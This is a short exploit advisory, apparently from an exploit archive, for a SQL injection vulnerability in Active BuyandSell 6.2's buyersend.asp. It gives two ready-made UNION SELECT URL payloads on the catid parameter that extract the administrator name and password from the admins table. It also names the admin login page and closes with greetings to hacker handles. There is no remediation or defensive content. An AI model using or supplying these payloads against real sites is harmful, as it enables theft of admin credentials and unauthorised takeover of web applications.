ActiveBuyandSell versions 6.2 suffers from a SQL injection vulnerability in buyersend.asp.
9ef1ec2fa3fa958253fdb9ca7664678171c95122f502f3e3326ad296acf336b4
#Title : Active BuyandSell Remote SQL Injection Vulnerability
#Author : CyberGhost
#Demo Page : http://www.activewebsoftwares.com/demoactivebuyandsell
#Script Page : http://www.activewebsoftwares.com/productinfo.aspx?productid=8
#Vuln.
#Username : /buyersend.asp?catid=-1+union+select+0,1,2,3,4,5,6,adminname,8,9,0,1,2,3,4,5,6+from+admins
#Password : /buyersend.asp?catid=-1+union+select+0,1,2,3,4,5,6,password,8,9,0,1,2,3,4,5,6+from+admins
#Admin Login : /admin.asp
====================================
Thanx : redLine - Hackinger - excellance - Liarhack - SaCReD SeeR - MaTRax - KinSize - BolivaR - kerem125 - by_emR3
And All TURKISH HACKERS !